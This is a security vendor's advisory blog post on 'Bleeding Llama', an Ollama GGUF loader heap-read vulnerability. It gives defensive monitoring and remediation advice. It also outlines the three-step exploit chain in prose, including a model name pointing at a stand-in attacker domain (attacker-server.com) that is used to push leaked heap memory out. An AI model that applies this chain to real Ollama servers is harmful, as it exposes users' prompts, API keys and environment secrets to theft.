Lyrie
Vulnerability
0 sources verified·5 min read
By Lyrie Threat Intelligence·5/11/2026

Bleeding Llama: The Memory Leak That Exposes Your AI Infrastructure

TL;DR

A critical out-of-bounds heap read vulnerability (CVE-2026-7482, CVSS 9.1) in Ollama allows unauthenticated remote attackers to leak the entire process memory of an Ollama server with just three API calls. The vulnerability, dubbed "Bleeding Llama," impacts 300,000+ exposed Ollama instances globally and potentially exposes API keys, user conversation data, system prompts, and environment variables.

What Happened

Cyera researchers disclosed CVE-2026-7482 in Ollama, the open-source platform with 170,000+ GitHub stars and 100M+ Docker Hub downloads that allows organizations to run LLMs locally instead of relying on cloud services. The vulnerability was reported to Ollama in early February 2026 but remained unpatched for nearly three months. With no explicit security advisory flagged in the fix, most users remain unaware of the urgency.

The vulnerability exists in Ollama's GGUF model loader, a critical pathway for creating custom model instances via the /api/create endpoint. When users upload GGUF files (the standard binary format for storing LLMs) to an exposed Ollama server, an attacker can craft a malicious GGUF file with inflated tensor metadata to trigger an out-of-bounds heap read during quantization—the process of converting model precision to reduce size and latency.

On May 2, 2026, Cyera published a detailed technical breakdown. Two days later, researcher alerts began spreading across the security community. Ollama had released version 0.17.1 containing the fix back in February, but without security flagging in release notes, organizations missed the urgency. Actively exposed Ollama servers remain vulnerable.

Technical Details

The Exploit Chain

The attack unfolds in three steps and requires zero authentication:

1. Upload a crafted GGUF file to the target Ollama server using the /api/blobs/sha256:[hash] endpoint. The file's tensor shape metadata is set to an unrealistically large number (e.g., 1 million elements) while the actual data is minimal.

2. Trigger the out-of-bounds read by calling /api/create with the malicious GGUF and a model name set to an attacker-controlled domain (e.g., http://attacker-server.com/namespace/model:tag). Ollama processes the file and begins quantization.

3. Exfiltrate the leaked memory using /api/push to upload the resulting model file (now containing unallocated heap data) directly to the attacker's server.

Why It Works

The vulnerability stems from Go's unsafe package—a low-level memory manipulation tool that bypasses Go's safety guarantees. During tensor quantization, the WriteTo() function calls ConvertToF32() with a tensor element count derived from the shape metadata. There is no validation that this count matches the actual buffer size. When the loop reads past the allocated buffer, it collects whatever happens to be adjacent in the heap.

The researchers used a clever lossless conversion trick: set the source format to F16 (float-16) and target format to F32 (float-32). This conversion doubles data size without precision loss, so leaked heap memory remains readable after quantization.

What's in the Heap

Cyera's proof-of-concept extracted:

  • User prompts and responses from concurrent Ollama sessions
  • System prompts from other models running on the same instance
  • Environment variables from the host machine (often containing API keys)
  • Internal configuration data

An enterprise with 10,000 employees using Ollama as an AI chat platform exposes all employee queries, proprietary analysis, customer data, and embedded secrets to a single unauthenticated API call.

Worse: if Ollama is connected to tool frameworks like Claude Code or similar autonomous agents, all tool outputs (code, API responses, technical designs) flow through the Ollama heap and become exfiltrable.

Lyrie Assessment

This vulnerability represents a fundamental architectural flaw in how Ollama ships—unauthenticated by default, listening on all interfaces (0.0.0.0), and without memory safety controls for binary format parsing.

Why CISOs should care:

1. The adoption problem: Ollama's ease of deployment means it's installed in enterprises without security review. Departments spin up instances to test open-source models and forget about them. Shodan and Censys show 300,000+ exposed instances—most in enterprises that don't know they exist.

2. The supply-chain angle: Organizations connecting Ollama to agent frameworks (Semantic Kernel, Anthropic's MCP, LangChain) are inadvertently creating credential exfiltration channels. A compromised Ollama heap becomes a pivot point into integrated tools, CI/CD systems, and cloud services.

3. The disclosure failure: Ollama acknowledged the flaw in February but released a fix without security flagging. This is a process failure that leaves the user community unprepared. Coordinated disclosure means nothing if the fix is shipped silently.

4. The unpatched Windows variants: Cyera also detailed two unpatched Windows-specific vulnerabilities (CVE-2026-42248, CVE-2026-42249) that chain auto-update mechanisms into persistent code execution. These remain unfixed in versions 0.12.10–0.22.0.

Lyrie's angle: As the autonomous defense platform, we focus on detection of unexpected heap exfiltration patterns. Organizations running Ollama should monitor for:

  • Unusual /api/create calls with suspicious tensor metadata (shape values in millions)
  • /api/push requests routing to external domains
  • Spike in GGUF file uploads from untrusted sources

Recommended Actions

1. Audit network exposure: Use Shodan queries ("Ollama" "version") to identify your own exposed instances. Disable external access immediately if found.

2. Apply the fix now: Upgrade all Ollama instances to version 0.17.1 or later. This is non-negotiable for internet-facing or high-value deployments.

3. Isolate behind authentication: Deploy an API gateway (nginx, Cloudflare, AWS ALB) with API key or mTLS authentication in front of all Ollama instances. The REST API does not provide built-in auth.

4. Segment Ollama from sensitive infrastructure: If Ollama is connected to agent frameworks or tool integrations, isolate it on a separate network segment with egress filtering. Assume the heap is compromised.

5. Windows-specific: If running Ollama on Windows, disable automatic updates (AutoUpdateEnabled=false) and remove any Ollama shortcuts from the Windows Startup folder immediately.

6. Monitor for exploitation: Implement network monitoring for outbound HTTPS/HTTP connections from Ollama servers to unexpected domains. Baseline what's normal, alert on deviation.

7. Scan your threat intelligence: If you operate in a targeted sector (defense, finance, government), assume your Ollama instance was probed. Check logs for suspicious /api/create and /api/push patterns from the past 3+ months.

Sources

1. The Hacker News: Ollama Out-of-Bounds Read Vulnerability

2. Cyera Research: Bleeding Llama — Critical Memory Leak in Ollama

3. CVE-2026-7482 Official Record

4. Echo AI Security Advisory


Lyrie.ai Cyber Research Division

Lyrie Verdict

Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.